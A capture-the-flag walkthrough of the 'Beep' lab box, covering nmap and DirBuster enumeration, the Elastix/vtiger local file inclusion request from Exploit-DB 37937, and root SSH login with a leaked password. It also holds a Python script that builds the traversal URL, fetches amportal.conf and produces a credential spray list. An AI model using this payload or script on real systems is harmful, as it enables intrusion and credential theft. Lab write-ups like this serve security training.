Beep has a very large number of running services, which can make it hard to pick the right way in. The box may be a little difficult for some, as there are several potential attack vectors.
We will use the following tools to pwn the box from a Kali Linux machine:
- NMAP
- Dirbuster
- Searchsploit
- Metasploit
Step 1 – Scanning the network
As an initial step, before the machine is exploited, it needs to be scanned and investigated.
This is important to determine what can be exploited afterwards. It is always better to spend time on this phase to extract the maximum amount of information.
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine which hosts are available on the network, which services those hosts offer, which operating systems they run, what packet filters and firewalls are in use, and many other characteristics.
Use the following command to get a basic idea of what we are scanning:
nmap -sV -sC -A 10.10.10.7
-sV: Probe open ports to determine service/version info
-sC: Run the default script set
-A: Aggressive scan. Enables OS detection, version detection, script scanning and traceroute. Note that -A already implies -sV and -sC, so listing them as well is harmless but redundant.
10.10.10.7: IP address of the Beep box
We can see that there are 12 open ports:
Port 22. Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding.
Port 25. Simple Mail Transfer Protocol (SMTP) used for email routing between mail servers.
Port 80. Hypertext Transfer Protocol (HTTP). Here it’s an Apache httpd 2.2.3.
Port 110. Post Office Protocol, version 3 (POP3).
Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC).
Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server.
Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS).
Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS).
Port 995. Post Office Protocol 3 over TLS/SSL (POP3S).
Port 3306. MySQL database system.
Port 4445. I2P HTTP/S proxy.
Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port).
Nmap finds quite a long list of services. We will start with Apache on port 80.
Step 2 – Enumeration of Directories.
I now use DirBuster, a multi-threaded Java application designed to brute force directory and file names on web/application servers.
Launch DirBuster by typing this command in the terminal:
dirbuster
Specify the target URL as http://10.10.10.7:80/ in the application.
I use the directory-list-2.3-medium.txt wordlist for this search.
DirBuster finds a huge list of directories belonging to several content management systems and open source applications. Several of the results correspond to applications with known vulnerabilities that can lead to a shell.
Step 3 – Visiting the URL.
Let’s try port 80 and visit http://10.10.10.7
The HTTP site redirects to HTTPS, which uses a self-signed certificate; after adding a security exception in the browser we can view the page. An Elastix login portal opens. Elastix is a unified communications server that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialing.
An IP PBX (Internet Protocol private branch exchange) is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business.
Searchsploit, the command-line front end to Exploit-DB, is used to look up known vulnerabilities in Elastix. Among the hits for Elastix is a local file inclusion exploit against the bundled vtiger CRM, Exploit-DB 37937.
The following command shows the exploit:
cat /usr/share/exploitdb/exploits/php/webapps/37937.pl
The LFI request from the exploit is:
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
An attacker can use Local File Inclusion (LFI) to trick the web application into disclosing or executing files on the web server. Here the current_language parameter reaches an include without sanitisation: the ../ sequences walk up to the filesystem root, and the trailing %00 (a null byte) truncates the string so that the suffix the script appends is ignored. An LFI attack may lead to information disclosure, remote code execution, or even cross-site scripting (XSS).
Step 4 – Trying the Elastix LFI exploit
Let’s navigate to the exploit URL on the HTTPS site. The included file is rendered inside an HTML page, so we view the page source to read its contents properly.
amportal.conf holds the FreePBX/Asterisk configuration, including several usernames and passwords, so we try to SSH into the box with these.
The other usernames do not work, so we try root over SSH with the following command.
ssh root@10.10.10.7
On a current Kali the old OpenSSH on the box may refuse to negotiate a key exchange; if so, re-enable the legacy algorithms with the KexAlgorithms and HostKeyAlgorithms ssh options. Enter the password jEhdIekWmdjE and, yes, we get an SSH session as root.
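The two steps above, locating the exploit and pulling credentials out of the file it discloses, can be scripted. The following is an added example written for this writeup, not code from the original post or from Exploit-DB 37937: it builds the LFI URL exactly as the exploit does, then parses an amportal.conf-style response into key/value pairs and picks out the password fields and a credential spray list. The SAMPLE_RESPONSE below is a constructed stand-in with made-up values, not the real file from the box; the fetch_lfi function and the target https://10.10.10.7 are assumptions for use on the lab network.

```python
"""Build the Elastix/vtiger LFI request from EDB-ID 37937 and harvest
credentials from the disclosed amportal.conf. Added example; values in
SAMPLE_RESPONSE are constructed, not the real file."""
import re
import ssl
import urllib.request

TARGET = "https://10.10.10.7"  # assumption: the box, which serves Elastix over HTTPS

# Request path from the exploit. The trailing %00 is a null byte: the old PHP
# behind Elastix truncates the string there, so the suffix graph.php appends to
# current_language never reaches the include.
LFI_TEMPLATE = ("/vtigercrm/graph.php?current_language="
                "{traversal}{path}%00&module=Accounts&action")

# Constructed sample of what graph.php returns once the file is included.
# Variable names follow amportal.conf; the values are placeholders.
SAMPLE_RESPONSE = """<html><body>
# constructed sample, not the real /etc/amportal.conf
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=dbSecretExample
AMPMGRUSER=admin
AMPMGRPASS=mgrSecretExample
AMPWEBADDRESS=10.10.10.7
</body></html>"""


def build_lfi_url(path, depth=8):
    """Return the full URL that includes `path`, using `depth` "../" hops.
    Eight hops reproduce the exploit's string byte for byte."""
    traversal = "../" * depth
    return TARGET + LFI_TEMPLATE.format(traversal=traversal, path=path)


def fetch_lfi(path):
    """Fetch a file through the LFI. Certificate checks are disabled because
    the box uses a self-signed certificate (the browser's security exception)."""
    ctx = ssl._create_unverified_context()
    with urllib.request.urlopen(build_lfi_url(path), context=ctx, timeout=10) as r:
        return r.read().decode("utf-8", errors="replace")


def parse_amportal(text):
    """Parse KEY=value lines into a dict, skipping comments, blanks and the
    HTML the file arrives wrapped in."""
    config = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Z_][A-Z0-9_]*)=(.*)$", line)
        if m:
            config[m.group(1)] = m.group(2).strip()
    return config


def secrets(config):
    """Only the keys that look like passwords; these go into the spray."""
    return {k: v for k, v in config.items()
            if re.search(r"PASS|PASSWORD|SECRET", k)}


def credential_candidates(config):
    """Pair every user-like value (plus root, since the writeup finds the
    password reused for root) with every password value."""
    users = {v for k, v in config.items() if k.endswith("USER")}
    users.add("root")
    passwords = set(secrets(config).values())
    return sorted((u, p) for u in users for p in passwords)


if __name__ == "__main__":
    # Offline demo on the constructed sample; on the lab network replace the
    # sample with fetch_lfi("/etc/amportal.conf").
    cfg = parse_amportal(SAMPLE_RESPONSE)
    print(build_lfi_url("/etc/amportal.conf"))
    for user, pw in credential_candidates(cfg):
        print(f"try: ssh {user}@10.10.10.7 with password {pw}")
```

The spray list is deliberately small: the FreePBX config reuses one password across the database, the Asterisk manager and the web interfaces, and on this box the same value works for root over SSH, so trying each harvested password against each harvested user plus root is enough.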
Step 5 – Looking for the root.txt flag
The following command tells us where we are on the machine.
pwd
We are in /root, and with
ls
we find the root.txt file.
To read the content of the file:
cat root.txt
Step 6 – Looking for the user.txt flag
Now look for the user.txt flag.
Go to the home directory.
cd /home
We find user.txt in /home/fanis. To read the content of the file:
cat /home/fanis/user.txt
Congrats! We found both flags! 😀